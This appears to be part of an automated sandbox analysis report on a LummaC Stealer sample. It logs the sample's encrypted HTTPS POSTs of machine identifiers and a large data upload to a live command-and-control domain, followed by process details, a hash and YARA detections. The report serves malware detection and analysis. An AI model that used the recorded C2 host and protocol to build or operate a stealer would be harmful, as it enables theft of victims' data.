                                                                                        2025-04-13 15:03:41 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                                                                        Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
                                                                                        2025-04-13 15:03:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.449727172.67.157.74436168C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-04-13 15:03:41 UTC286OUTPOST /ogda HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=M5rCx1rQKbvEY51lEz0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                        Content-Length: 2390
                                                                                        Host: bxattlepath.digital
                                                                                        2025-04-13 15:03:41 UTC2390OUTData Raw: 2d 2d 4d 35 72 43 78 31 72 51 4b 62 76 45 59 35 31 6c 45 7a 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 33 66 66 63 39 34 38 37 31 38 63 36 61 62 63 36 32 35 38 37 39 38 64 35 66 65 34 36 31 34 38 32 61 35 65 63 63 35 0d 0a 2d 2d 4d 35 72 43 78 31 72 51 4b 62 76 45 59 35 31 6c 45 7a 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 35 72 43 78 31 72 51 4b 62 76 45 59 35 31 6c 45 7a 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 34 38
                                                                                        Data Ascii: --M5rCx1rQKbvEY51lEz0Content-Disposition: form-data; name="uid"3ffc948718c6abc6258798d5fe461482a5ecc5--M5rCx1rQKbvEY51lEz0Content-Disposition: form-data; name="pid"1--M5rCx1rQKbvEY51lEz0Content-Disposition: form-data; name="hwid"0D48
                                                                                        2025-04-13 15:03:42 UTC812INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Apr 2025 15:03:42 GMT
                                                                                        Content-Type: application/json
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YpKQP9H6QLRFEmvibMnvuuHZJM887p7ckuCSCPegRm0NMIEGS8%2BrpYJ44hjGV%2BCGEbqiUiUwOP%2FI1n%2FvBkz39LDBSHhrtiPCcjJSmYAEn8edudvj5v8yaEgyLIV9KphATvScruhi"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 92fbda05c9dbc430-JAX
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=112233&min_rtt=112211&rtt_var=23704&sent=6&recv=10&lost=0&retrans=0&sent_bytes=2846&recv_bytes=3312&delivery_rate=35961&cwnd=252&unsent_bytes=0&cid=8a1b9fdf8e7ff8d5&ts=446&x=0"
                                                                                        2025-04-13 15:03:42 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                                                                        Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
                                                                                        2025-04-13 15:03:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.449728172.67.157.74436168C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-04-13 15:03:42 UTC278OUTPOST /ogda HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=53YKf4xb4
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                        Content-Length: 569583
                                                                                        Host: bxattlepath.digital
                                                                                        2025-04-13 15:03:42 UTC15331OUTData Raw: 2d 2d 35 33 59 4b 66 34 78 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 33 66 66 63 39 34 38 37 31 38 63 36 61 62 63 36 32 35 38 37 39 38 64 35 66 65 34 36 31 34 38 32 61 35 65 63 63 35 0d 0a 2d 2d 35 33 59 4b 66 34 78 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 33 59 4b 66 34 78 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 34 38 31 46 35 34 35 39 45 39 37 34 32 44 41 44 35 39 43 34 43 41 31 39 41 45 37 36 32 35 0d 0a
                                                                                        Data Ascii: --53YKf4xb4Content-Disposition: form-data; name="uid"3ffc948718c6abc6258798d5fe461482a5ecc5--53YKf4xb4Content-Disposition: form-data; name="pid"1--53YKf4xb4Content-Disposition: form-data; name="hwid"0D481F5459E9742DAD59C4CA19AE7625
                                                                                        2025-04-13 15:03:42 UTC15331OUTData Raw: 84 a0 d1 26 0d d5 0a 9d 22 4e 58 d2 ce 27 4c 93 86 b6 a7 b3 6c 79 f2 7d 0f fa 78 94 d7 9a 88 a7 a1 b7 97 5c 82 8f 66 35 50 10 a9 52 05 fe 6b 6f 9e 27 25 6e 43 a8 f0 b5 be 1e 4f 27 8f e5 e3 82 7e 0a 66 93 73 18 36 bd 8b c7 f3 9d e9 bb f3 89 ee 7b 60 f2 54 68 1e c6 c8 e4 26 ea d7 f4 26 b6 cd 89 98 c9 b3 e5 ae 95 a1 d0 43 41 f7 77 b1 2a e7 88 db 97 af 47 f0 c1 1f 28 75 8c ef 6a e1 44 36 ee 73 4d cf ba c6 8a ef 36 7e 0d 02 be e0 01 1c 3f d4 47 ff f7 f9 57 06 4f 23 c4 8c fa 36 91 1d da 53 08 7d 79 9c 6d 27 b7 21 87 1a be 55 5a a8 9a cb 62 be 89 ac 6a 3b 67 92 71 1d ab 63 18 5c 5d b1 73 2e 99 7b e0 5c 02 9c 87 4b 2a c9 a3 6a 59 54 3f 65 91 c0 54 a9 fd 04 05 84 71 92 44 3a 75 a2 86 95 48 d8 8a 7d 4b 8d 25 69 b0 ee c4 d1 18 f8 37 20 d8 86 59 71 98 9b eb df c5 8c
                                                                                        Data Ascii: &"NX'Lly}x\f5PRko'%nCO'~fs6{`Th&&CAw*G(ujD6sM6~?GWO#6S}ym'!UZbj;gqc\]s.{\K*jYT?eTqD:uH}K%i7 Yq
                                                                                        2025-04-13 15:03:42 UTC15331OUTData Raw: 58 0e 96 5d 48 c6 37 67 4f 77 79 00 0c a6 38 9d 2e ed f1 d0 46 fc 1a f0 78 47 b0 6b 9a 76 ab 69 29 1d 21 8a 21 9a 13 1f 15 ce 37 87 6a c3 fd e3 b5 05 10 25 42 63 e6 49 69 30 14 ec 83 2c fb 6f 2e db 9c 34 4f 4a 07 22 2c 67 ef 16 85 9f 23 77 10 37 02 47 22 0d 74 4e d8 58 ad d7 55 3f cc 78 ed 5f 1c 11 20 c1 9e 73 b0 a0 fc 07 d2 9b 62 16 e3 2e 12 9e 0b 3c 10 89 c2 d9 6a 68 74 55 c8 4a 96 76 d3 38 12 83 77 c7 82 dd 1a ab ed 12 ac 22 08 bc 87 33 0e bd 13 6f 30 06 99 4c 4a 61 89 34 c3 e9 76 b7 63 3f 83 7a 1f 38 b6 1f 47 b4 7e b9 ee cf 54 65 1b aa a5 40 d1 91 d4 e2 a1 f7 96 0c 2b 10 e5 ba 97 b4 e7 e2 d2 e7 46 d4 94 89 87 9d 3a b4 42 9c b5 7e 2e fd 6c d9 8f 83 10 b4 d4 51 42 b5 d1 f6 b9 51 eb 7e b8 30 f9 e2 74 61 4f 28 9f 3e 3a 56 42 b2 53 95 e6 bf 58 a3 56 22 a3
                                                                                        Data Ascii: X]H7gOwy8.FxGkvi)!!7j%BcIi0,o.4OJ",g#w7G"tNXU?x_ sb.<jhtUJv8w"3o0LJa4vc?z8G~Te@+F:B~.lQBQ~0taO(>:VBSXV"
                                                                                        2025-04-13 15:03:42 UTC15331OUTData Raw: ca 29 c6 e7 eb f2 86 82 ec 26 95 71 ad c4 cf 00 bd 1f c5 a1 1e 6d d3 32 2e 6e 76 65 45 e8 a8 e6 64 a3 f0 3b 5a e0 58 a4 82 2f 7d 3d db c3 b8 ae cd 27 51 64 05 30 c1 75 60 be 55 0d 9b b5 a4 57 80 22 be a8 c4 eb f3 e9 6f b7 0e 20 b1 df bb 3b f9 cb c7 87 c0 4c f0 71 a6 b7 e8 2a 83 aa 44 1b 19 d5 58 34 72 d6 65 66 19 bf d1 cf 94 a5 e9 46 ac 3b 32 93 67 02 8e a2 58 62 ac f4 23 32 d1 0b 7f 7f ea a9 74 bb 6f e0 3b b8 6e 53 1b 9c 5e 28 f2 43 6e ab 76 72 7e 89 d2 61 28 3b bb 86 0f 1e ca cc 23 ec 5f ef 1c f8 be d9 3c ab 7b ad a2 87 a2 de ea 3f 0e ed 78 77 3e 92 4f 30 d4 f0 21 86 1b ad f5 a0 96 43 75 41 9a 0d 52 18 f2 75 46 18 31 0e 68 ba 9c 80 90 b6 77 07 2d d1 84 a5 97 82 94 89 d5 c0 d0 44 7f 8d 82 0f 44 ee e2 42 ed 01 5c b3 36 5a 83 6a ae 53 6d c1 14 e7 da c6 92
                                                                                        Data Ascii: )&qm2.nveEd;ZX/}='Qd0u`UW"o ;Lq*DX4refF;2gXb#2to;nS^(Cnvr~a(;#_<{?xw>O0!CuARuF1hw-DDB\6ZjSm
                                                                                        2025-04-13 15:03:42 UTC15331OUTData Raw: 4f b5 01 2b cc 66 fc d1 ad 68 b4 22 e6 04 e5 d8 64 44 18 2d 9c 40 19 31 2c 8b 25 46 c6 e9 bd 55 e1 88 8b 10 63 c5 9d c8 45 28 20 dc 24 8f b9 f2 dd 60 17 cf e9 aa 22 3b 8e b8 64 f8 f7 37 9b 18 a1 3a b0 36 f9 f0 ea af 0b 29 6b 93 07 53 ef 4e 4b 26 7a d4 f3 e2 ae 55 26 d3 5d e9 a7 54 6f da 53 cf bb e9 7b 8a 6e 53 e2 c1 f1 81 96 4e 92 39 8b 4f 50 4e 02 3f dd 35 af d0 49 ea 5b 5b e8 69 83 a5 47 8e a6 43 2f a8 fc 3d 90 2b ee 29 86 dc 8c e4 a9 eb 28 b7 7f 4c 08 4c 5f af 89 67 d4 f0 bc 83 49 96 46 8b f2 11 c8 79 d2 f5 eb 3f 3f 17 bf e7 0c d5 60 f1 7d c4 23 53 4a 9a 82 b1 79 96 59 59 f3 b3 89 a2 7e 3a 2a a9 17 90 0a 51 1b b2 c5 d8 a2 07 e4 ca 7b dc 63 11 66 f5 2d ad 88 fd 8c 6a b9 90 2a c5 bb 8e 17 00 4d 4c 43 d1 6c 2e 3c 0f b3 8c 9a 79 5f bf cb 75 17 71 de 18 c0
                                                                                        Data Ascii: O+fh"dD-@1,%FUcE( $`";d7:6)kSNK&zU&]ToS{nSN9OPN?5I[[iGC/=+)(LL_gIFy??`}#SJyYY~:*Q{cf-j*MLCl.<y_uq
                                                                                        2025-04-13 15:03:42 UTC15331OUTData Raw: 09 24 46 79 b2 0f 0b a6 b7 22 e3 7f 80 62 4f 9f a4 f1 7c 23 13 64 80 64 9f 1b f9 f1 37 35 05 3a 4c 18 15 7c f4 fb 01 52 ab 67 81 ec 94 59 ee ef e6 f8 af 6d 77 4e a4 30 bc 84 aa f4 89 0b 28 43 9f 88 65 d7 33 54 96 f7 05 b9 cf 9d 4b 2e 56 26 38 bf f2 6b 84 80 52 37 97 6f 7c 70 c9 25 ff 31 bc 51 15 4b 86 3f 88 72 86 ed 9f 52 91 b9 31 e8 a4 b0 5d 4f 46 35 eb 47 8c d8 bc f6 38 5b 39 21 fa f8 bd 06 6d ae 42 67 ee 38 cc e3 a3 70 8e 26 04 a9 2f 21 92 1b b2 44 da 50 8b 61 bd 90 13 60 e9 03 c2 f8 b4 f8 51 c8 ee b9 c6 0f cc ac 63 30 7d c5 27 c5 db 87 14 a9 07 1a e5 d5 2b 24 cc 1a 91 69 cc 66 95 34 5d 75 1b 18 22 da 20 88 87 ec ba b5 c6 74 3b fb c2 dc f1 22 45 1c 07 52 12 04 cb b6 f9 e7 44 82 06 e9 99 0b b9 51 e4 69 df 19 66 0d 27 0c 5c 1e 31 59 4a 2c 81 63 37 41 56
                                                                                        Data Ascii: $Fy"bO|#dd75:L|RgYmwN0(Ce3TK.V&8kR7o|p%1QK?rR1]OF5G8[9!mBg8p&/!DPa`Qc0}'+$if4]u" t;"ERDQif'\1YJ,c7AV
                                                                                        2025-04-13 15:03:42 UTC15331OUTData Raw: ac c1 54 d5 4e f1 54 50 fc 5a 98 10 c0 00 41 36 f7 f4 e1 28 89 66 f8 a6 ec ab 42 93 2e 43 fc b7 0a de ad 14 ef ab e7 6b 54 cd ee da 83 f0 65 e8 2e c8 6d f0 81 64 71 d8 0c ca 00 6c 87 73 d3 f6 e4 9a dd 6d c7 c0 50 08 55 d3 59 dc 7e 8a b7 e1 df d5 fd 40 20 fd 44 85 ea b8 e0 3d 72 b0 13 30 51 9d 39 38 0a 82 75 ad cc 00 ae 01 24 33 58 86 19 e7 5b bf ad a5 d3 59 f3 48 44 cd a5 d5 94 67 93 d2 56 f8 03 46 71 39 c5 2c 67 e1 be 8b d5 a5 87 9b a9 7d 82 d0 73 7e 04 21 6a 8c 09 ba 4e 01 bc 66 7a a7 ce 3c 78 34 93 07 96 8a 00 f0 23 0a 2b 58 29 63 91 17 7f f3 1d cf b1 e1 6a d1 56 f5 8f 3f 17 3c 53 96 0f f6 21 df 2a 07 f0 7e 65 e4 43 71 10 a9 24 f2 b1 d6 6c 13 69 41 c3 11 fb 72 89 2d 6e 59 cf e6 8e 82 c2 12 04 8a 04 fe 71 ca 03 1d d0 77 7f d9 11 f1 a4 44 ac 2d cf a0 ff
                                                                                        Data Ascii: TNTPZA6(fB.CkTe.mdqlsmPUY~@ D=r0Q98u$3X[YHDgVFq9,g}s~!jNfz<x4#+X)cjV?<S!*~eCq$liAr-nYqwD-
                                                                                        2025-04-13 15:03:42 UTC15331OUTData Raw: e4 1d 4c 5e 63 2e 68 23 a7 60 32 2b c1 3c 94 ef 77 2a 43 fe 22 0b ad 88 d4 ea 59 c6 9d 78 b9 61 82 c4 9d 3f 22 b8 72 f6 b3 06 3b f9 4e dd 81 9f f0 4a ae e5 57 05 1d 1f b8 9e 7d 23 bc 73 6e fc 87 f7 a8 c6 b2 02 e3 b9 54 95 ee cd ba d1 64 43 fc 31 a2 d1 45 94 72 87 71 b0 78 ea ef c0 e2 5d 71 ec 91 51 16 34 5e 07 49 6c 09 fb 68 d3 87 74 23 9a 78 7c e4 29 57 54 8c b0 fb ad 58 8e 9e db 7e 34 b4 c5 ae 98 22 6c df 40 be 02 81 36 8e 2f 82 ef dd 51 95 df 12 a5 b3 37 48 56 d5 00 53 63 67 cd d2 1a 8f 19 e8 92 9b b9 30 68 25 0a d0 ef 9b df 05 dc 4a 63 9d 70 7f 61 84 ba a1 9a b5 9c 67 12 ed a6 f0 1d 10 d5 30 35 b6 47 0d 3b ce 91 b1 71 12 4d 22 ae e9 eb b7 b2 89 e5 80 01 8a 24 db 27 bd 02 1b 3c 77 f1 0e 7f 6f 63 85 6e 62 b5 24 8a 92 17 c9 48 86 5c 95 4b c6 1c 46 b3 e9
                                                                                        Data Ascii: L^c.h#`2+<w*C"Yxa?"r;NJW}#snTdC1Erqx]qQ4^Ilht#x|)WTX~4"l@6/Q7HVScg0h%Jcpag05G;qM"$'<wocnb$H\KF
                                                                                        2025-04-13 15:03:42 UTC15331OUTData Raw: 7e 51 d9 47 a5 ab ab b3 96 e1 c4 26 ae 9e 79 fa bf 0e 59 1c ba e4 66 fd 2c 2e e2 3a fc 1b a6 56 cd 81 b5 8b b0 9f 61 cb 57 5d 0b 6e 41 09 74 89 0f d6 62 b3 f8 19 07 f6 c5 4f 67 06 43 fd 6c d7 b5 94 67 69 38 23 c2 1a 29 d9 c9 60 d5 33 83 b0 40 3f c8 9f 05 8a 8d 48 0a bf 5b 60 6c fd 30 23 a7 e1 d7 71 13 89 88 02 10 c5 9b 48 25 9b 7e 27 52 d1 ed 8b ab fb 85 82 88 2e 54 c6 5a 34 42 a6 e6 e7 27 95 70 b1 ab 62 f6 9a 5b 86 0d b4 22 d1 28 0d 93 93 c9 7a 21 02 6f 55 db ae cc 63 ea a0 3c 81 f1 01 ea d4 3e 76 71 80 f8 ed 85 68 41 72 fe 62 7e 10 98 da 58 2e 40 8e 2c 8e 83 25 16 f7 36 e7 b8 50 8d 53 7e 3f bc 66 80 35 0c 4d b2 5f 29 ff 85 67 61 33 c2 e1 82 81 b6 4e 0f 1c b7 41 50 1f d2 bf c9 24 25 48 49 3b f8 80 0b 24 7b d3 27 19 d9 29 68 a3 03 9d 73 a3 b6 e9 46 ac 0e
                                                                                        Data Ascii: ~QG&yYf,.:VaW]nAtbOgClgi8#)`3@?H[`l0#qH%~'R.TZ4B'pb["(z!oUc<>vqhArb~X.@,%6PS~?f5M_)ga3NAP$%HI;${')hsF
                                                                                        2025-04-13 15:03:42 UTC15331OUTData Raw: 40 54 a4 96 6b de 23 53 26 77 54 05 7a ce 7b 47 dc 14 e8 b5 d9 f6 30 fc 14 1c e1 fb f5 9b 45 90 9c d4 cf a0 ea f2 5b 60 53 fb d7 7b d1 e8 73 c5 d0 63 25 76 52 ce b4 51 ca 77 d4 2a 43 67 c6 90 cc 15 ba 74 2e 05 a7 ce a5 43 2f 16 a1 33 18 f8 aa 86 c7 1a 72 b7 ff fd 48 88 58 d4 c4 0b ea ac 1c 36 3b 5a fc f3 a2 f6 01 94 42 b5 9f 17 6a 93 73 65 86 18 89 e8 53 f4 64 a4 7e 0a 99 12 e5 26 5c ee 07 79 ba 5f 9e ac 77 4c 69 d7 08 46 ff f0 d1 f8 04 0a 0b d1 ae 6d 71 bc ab b6 7d 69 2f e5 ed 37 93 42 dd b5 68 db 2e 5a 15 5f 67 5c 1d b3 0d 7d 96 6e 56 df 33 66 1a 36 cd 0c ca a5 e4 26 a3 2a bc ad 16 3b b4 2d 3b c9 be a2 ae cd 9c 3f 4c 77 1e 30 fb f4 a8 2f 0d e1 f7 0a d0 bf ba 5b f3 4b ef fc 53 a3 c6 f6 b7 f4 cc a2 6e ee 36 7c 99 b1 4a 67 08 55 58 44 80 7c 87 eb ec af e8
                                                                                        Data Ascii: @Tk#S&wTz{G0E[`S{sc%vRQw*Cgt.C/3rHX6;ZBjseSd~&\y_wLiFmq}i/7Bh.Z_g\}nV3f6&*;-;?Lw0/[KSn6|JgUXD|
                                                                                        2025-04-13 15:03:44 UTC814INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Apr 2025 15:03:44 GMT
                                                                                        Content-Type: application/json
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8lrX7TVmkI4F99FT6sDuHplMwMj5w2xMngSS8Hbl9xcxdL3oyZeRXRMm9FnmavOo5YlZrGQ0AsxZbBw1qH2zaIGIPMxRli%2B19s5Xl%2BJ0dzd0rql6I6h9FKWtKkKr29GEzMVWldEp"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 92fbda0d4ece49f2-JAX
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=112455&min_rtt=112445&rtt_var=23724&sent=236&recv=434&lost=0&retrans=0&sent_bytes=2846&recv_bytes=572125&delivery_rate=35908&cwnd=252&unsent_bytes=0&cid=b18043e971dd18ba&ts=1808&x=0"


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.449729172.67.157.74436168C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-04-13 15:03:44 UTC269OUTPOST /ogda HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                        Content-Length: 117
                                                                                        Host: bxattlepath.digital
                                                                                        2025-04-13 15:03:44 UTC117OUTData Raw: 75 69 64 3d 33 66 66 63 39 34 38 37 31 38 63 36 61 62 63 36 32 35 38 37 39 38 64 35 66 65 34 36 31 34 38 32 61 35 65 63 63 35 26 63 69 64 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 30 44 34 38 31 46 35 34 35 39 45 39 37 34 32 44 41 44 35 39 43 34 43 41 31 39 41 45 37 36 32 35
                                                                                        Data Ascii: uid=3ffc948718c6abc6258798d5fe461482a5ecc5&cid=637b55279021aab33278188cfa638397&hwid=0D481F5459E9742DAD59C4CA19AE7625
                                                                                        2025-04-13 15:03:45 UTC793INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Apr 2025 15:03:45 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 108
                                                                                        Connection: close
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bS%2B6S456YE%2FH6vrF4ndd5wcXSt8eCxECjyF5pKWwf2sp59CT1GrR1RDVlf%2Bh9jEnYh1ucaefYMumbwspGMNfwa48bN6S%2BxNwb6Wj%2BXRLhV8sseYOORoUG04bOHozHmuqpT%2FxWT2B"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 92fbda1b0e3d53b7-ATL
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=105872&min_rtt=105852&rtt_var=22361&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1022&delivery_rate=38120&cwnd=251&unsent_bytes=0&cid=6195e04c16320e6d&ts=589&x=0"
                                                                                        2025-04-13 15:03:45 UTC108INData Raw: e5 e7 35 d4 76 f9 5b 53 95 c5 4c 4e 04 91 dd f9 02 97 48 f1 e2 84 ab 6b 87 8c 39 39 91 84 90 35 ed 5a b8 43 4d d8 78 de 16 c0 e3 8b 4e d8 65 c5 79 e9 43 17 39 76 13 37 4f 06 2c 52 ee 64 d6 a7 d5 17 f9 70 33 64 a7 b8 a7 88 f7 ad 73 13 b8 bd 7a 05 25 63 c8 1c cb f1 57 38 6f b4 b1 45 25 fa ea 34 29 f6 1b 8e ae 6a 69 e9 ba d2
                                                                                        Data Ascii: 5v[SLNHk995ZCMxNeyC9v7O,Rdp3dsz%cW8oE%4)ji


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Target ID:0
                                                                                        Start time:11:03:12
                                                                                        Start date:13/04/2025
                                                                                        Path:C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe"
                                                                                        Imagebase:0x840000
                                                                                        File size:866'816 bytes
                                                                                        MD5 hash:CB0642AC717F55A8AAC26B51FA96151D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1509457660.0000000002681000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1476540257.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Reset < >